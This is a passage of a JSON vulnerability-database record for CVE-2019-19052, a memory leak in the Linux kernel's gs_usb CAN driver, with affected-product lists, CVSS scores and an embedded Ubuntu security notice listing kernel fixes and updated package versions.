        "vendor": "netapp",
        "version": "11.50.2"
      },
      {
        "model": "sd-wan edge",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.2"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.79"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40.5"
      },
      {
        "model": "hci baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "h610s"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.3"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.201"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.154"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.70.2"
      },
      {
        "model": "solidfire \\\u0026 hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "brocade fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.20"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.04"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.3.11"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "linux",
        "version": "5.3.11"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012046"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19052"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.3.11",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.16.79",
                "versionStartIncluding": "3.16",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.201",
                "versionStartIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.201",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.154",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.84",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:sd-wan_edge:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:aff_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire_\\\u0026_hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire\\,_enterprise_sds_\\\u0026_hci_storage_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:broadcom:brocade_fabric_operating_system_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:fas\\/aff_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.30.5r3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40.3r2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.2:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.2:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.70.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.70.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h610s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:hci_compute_node_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:hci_compute_node:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:solidfire_baseboard_management_controller:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19052"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "155856"
      },
      {
        "db": "PACKETSTORM",
        "id": "155853"
      },
      {
        "db": "PACKETSTORM",
        "id": "155855"
      },
      {
        "db": "PACKETSTORM",
        "id": "155854"
      },
      {
        "db": "PACKETSTORM",
        "id": "155867"
      },
      {
        "db": "PACKETSTORM",
        "id": "155995"
      },
      {
        "db": "PACKETSTORM",
        "id": "155866"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1073"
      }
    ],
    "trust": 1.3
  },
  "cve": "CVE-2019-19052",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-19052",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-151460",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-19052",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-19052",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201911-1073",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-151460",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-19052",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151460"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19052"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012046"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19052"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1073"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A memory leak in the gs_can_open() function in drivers/net/can/usb/gs_usb.c in the Linux kernel before 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering usb_submit_urb() failures, aka CID-fb5be6a7b486. Linux Kernel Contains a resource exhaustion vulnerability. Vendors have confirmed this vulnerability CID-fb5be6a7b486 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. =========================================================================\nUbuntu Security Notice USN-4226-1\nJanuary 07, 2020\n\nlinux, linux-aws, linux-aws-5.0, linux-azure, linux-gcp, linux-gke-5.0,\nlinux-kvm, linux-oem-osp1, linux-oracle, linux-oracle-5.0, linux-raspi2\nvulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 19.04\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux: Linux kernel\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n- linux-azure: Linux kernel for Microsoft Azure Cloud systems\n- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems\n- linux-kvm: Linux kernel for cloud environments\n- linux-oracle: Linux kernel for Oracle Cloud systems\n- linux-raspi2: Linux kernel for Raspberry Pi 2\n- linux-aws-5.0: Linux kernel for Amazon Web Services (AWS) systems\n- linux-gke-5.0: Linux kernel for Google Container Engine (GKE) systems\n- linux-oem-osp1: Linux kernel for OEM processors\n- linux-oracle-5.0: Linux kernel for Oracle Cloud systems\n\nDetails:\n\nMichael Hanselmann discovered that the CIFS implementation in the Linux\nkernel did not sanitize paths returned by an SMB server. An attacker\ncontrolling an SMB server could use this to overwrite arbitrary files. \n(CVE-2019-10220)\n\nIt was discovered that a heap-based buffer overflow existed in the Marvell\nWiFi-Ex Driver for the Linux kernel. A physically proximate attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-14895, CVE-2019-14901)\n\nIt was discovered that a heap-based buffer overflow existed in the Marvell\nLibertas WLAN Driver for the Linux kernel. A physically proximate attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-14896, CVE-2019-14897)\n\nIt was discovered that the Fujitsu ES network device driver for the Linux\nkernel did not properly check for errors in some situations, leading to a\nNULL pointer dereference. A local attacker could use this to cause a denial\nof service. (CVE-2019-16231)\n\nIt was discovered that the QLogic Fibre Channel driver in the Linux kernel\ndid not properly check for error, leading to a NULL pointer dereference. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash). (CVE-2019-16233)\n\nNicolas Waisman discovered that the WiFi driver stack in the Linux kernel\ndid not properly validate SSID lengths. A physically proximate attacker\ncould use this to cause a denial of service (system crash). \n(CVE-2019-17133)\n\nAnthony Steinhauser discovered that the Linux kernel did not properly\nperform Spectre_RSB mitigations to all processors for PowerPC architecture\nsystems in some situations. A local attacker could use this to expose\nsensitive information. (CVE-2019-18660)\n\nIt was discovered that the Mellanox Technologies Innova driver in the Linux\nkernel did not properly deallocate memory in certain failure conditions. (CVE-2019-19045)\n\nIt was discovered that the VirtualBox guest driver implementation in the\nLinux kernel did not properly deallocate memory in certain error\nconditions. (CVE-2019-19048)\n\nIt was discovered that Geschwister Schneider USB CAN interface driver in\nthe Linux kernel did not properly deallocate memory in certain failure\nconditions. (CVE-2019-19052)\n\nIt was discovered that the netlink-based 802.11 configuration interface in\nthe Linux kernel did not deallocate memory in certain error conditions. (CVE-2019-19055)\n\nIt was discovered that the ADIS16400 IIO IMU Driver for the Linux kernel\ndid not properly deallocate memory in certain error conditions. \n(CVE-2019-19060)\n\nIt was discovered that the Intel OPA Gen1 Infiniband Driver for the Linux\nkernel did not properly deallocate memory in certain error conditions. (CVE-2019-19065)\n\nIt was discovered that the AMD Audio CoProcessor Driver for the Linux\nkernel did not properly deallocate memory in certain error conditions. (CVE-2019-19067)\n\nIt was discovered that the event tracing subsystem of the Linux kernel did\nnot properly deallocate memory in certain error conditions. (CVE-2019-19072)\n\nIt was discovered that the Cascoda CA8210 SPI 802.15.4 wireless controller\ndriver for the Linux kernel did not properly deallocate memory in certain\nerror conditions. (CVE-2019-19075)\n\nIt was discovered that the AMD Display Engine Driver in the Linux kernel\ndid not properly deallocate memory in certain error conditions. A\nphysically proximate attacker could possibly use this to cause a denial of\nservice (system crash) or execute arbitrary code. (CVE-2019-19524)\n\nIt was discovered that the NXP PN533 NFC USB driver in the Linux kernel did\nnot properly free resources after a late probe error, leading to a use-\nafter-free vulnerability. A physically proximate attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-19526)\n\nIt was discovered that the Microchip CAN BUS Analyzer driver in the Linux\nkernel contained a use-after-free vulnerability on device disconnect. A\nphysically proximate attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-19529)\n\nIt was discovered that multiple USB HID device drivers in the Linux kernel\ndid not properly validate device metadata on attachment, leading to out-of-\nbounds writes. A physically proximate attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2019-19532)\n\nIt was discovered that the PEAK-System Technik USB driver in the Linux\nkernel did not properly sanitize memory before sending it to the device. A\nphysically proximate attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2019-19534)\n\nIt was discovered that in some situations the fair scheduler in the Linux\nkernel did not permit a process to use its full quota time slice. A local\nattacker could use this to cause a denial of service. (CVE-2019-19922)\n\nIt was discovered that the binder IPC implementation in the Linux kernel\ndid not properly perform bounds checking in some situations, leading to an\nout-of-bounds write. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2019-2214)\n\nNicolas Waisman discovered that the Chelsio T4/T5 RDMA Driver for the Linux\nkernel performed DMA from a kernel stack. A local attacker could use this\nto cause a denial of service (system crash). (CVE-2019-17075)\n\nIt was discovered that the DesignWare USB3 controller driver in the Linux\nkernel did not properly deallocate memory in some error conditions. (CVE-2019-18813)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 19.04:\n  linux-image-5.0.0-1009-oracle   5.0.0-1009.14\n  linux-image-5.0.0-1023-aws      5.0.0-1023.26\n  linux-image-5.0.0-1024-kvm      5.0.0-1024.26\n  linux-image-5.0.0-1024-raspi2   5.0.0-1024.25\n  linux-image-5.0.0-1028-azure    5.0.0-1028.30\n  linux-image-5.0.0-1028-gcp      5.0.0-1028.29\n  linux-image-5.0.0-38-generic    5.0.0-38.41\n  linux-image-5.0.0-38-generic-lpae  5.0.0-38.41\n  linux-image-5.0.0-38-lowlatency  5.0.0-38.41\n  linux-image-aws                 5.0.0.1023.25\n  linux-image-azure               5.0.0.1028.28\n  linux-image-gcp                 5.0.0.1028.53\n  linux-image-generic             5.0.0.38.40\n  linux-image-generic-lpae        5.0.0.38.40\n  linux-image-gke                 5.0.0.1028.53\n  linux-image-kvm                 5.0.0.1024.25\n  linux-image-lowlatency          5.0.0.38.40\n  linux-image-oracle              5.0.0.1009.35\n  linux-image-raspi2              5.0.0.1024.22\n  linux-image-virtual             5.0.0.38.40\n\nUbuntu 18.04 LTS:\n  linux-image-5.0.0-1009-oracle   5.0.0-1009.14~18.04.1\n  linux-image-5.0.0-1023-aws      5.0.0-1023.26~18.04.1\n  linux-image-5.0.0-1027-gke      5.0.0-1027.28~18.04.1\n  linux-image-5.0.0-1028-azure    5.0.0-1028.30~18.04.1\n  linux-image-5.0.0-1033-oem-osp1  5.0.0-1033.38\n  linux-image-aws-edge            5.0.0.1023.37\n  linux-image-azure               5.0.0.1028.39\n  linux-image-gke-5.0             5.0.0.1027.16\n  linux-image-oem-osp1            5.0.0.1033.37\n  linux-image-oracle-edge         5.0.0.1009.8\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4226-1\n  CVE-2019-10220, CVE-2019-14895, CVE-2019-14896, CVE-2019-14897,\n  CVE-2019-14901, CVE-2019-16231, CVE-2019-16233, CVE-2019-17075,\n  CVE-2019-17133, CVE-2019-18660, CVE-2019-18813, CVE-2019-19045,\n  CVE-2019-19048, CVE-2019-19052, CVE-2019-19055, CVE-2019-19060,\n  CVE-2019-19065, CVE-2019-19067, CVE-2019-19072, CVE-2019-19075,\n  CVE-2019-19083, CVE-2019-19524, CVE-2019-19526, CVE-2019-19529,\n  CVE-2019-19532, CVE-2019-19534, CVE-2019-19922, CVE-2019-2214\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux/5.0.0-38.41\n  https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1023.26\n  https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1028.30\n  https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1028.29\n  https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1024.26\n  https://launchpad.net/ubuntu/+source/linux-oracle/5.0.0-1009.14\n  https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1024.25\n  https://launchpad.net/ubuntu/+source/linux-aws-5.0/5.0.0-1023.26~18.04.1\n  https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1028.30~18.04.1\n  https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1027.28~18.04.1\n  https://launchpad.net/ubuntu/+source/linux-oem-osp1/5.0.0-1033.38\n  https://launchpad.net/ubuntu/+source/linux-oracle-5.0/5.0.0-1009.14~18.04.1\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19052"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012046"
      },
      {
        "db": "VULHUB",
        "id": "VHN-151460"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19052"
      },
      {
        "db": "PACKETSTORM",
        "id": "155856"
      },
      {
        "db": "PACKETSTORM",
        "id": "155853"
      },
      {
        "db": "PACKETSTORM",
        "id": "155855"
      },
      {
        "db": "PACKETSTORM",
        "id": "155854"
      },
      {
        "db": "PACKETSTORM",
        "id": "155867"
      },
      {
        "db": "PACKETSTORM",
        "id": "155995"
      },
      {
        "db": "PACKETSTORM",
        "id": "155866"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-19052",
        "trust": 3.3
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012046",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1073",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155856",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155867",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155995",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0851",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1745.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0052",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4793",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0200",
        "trust": 0.6
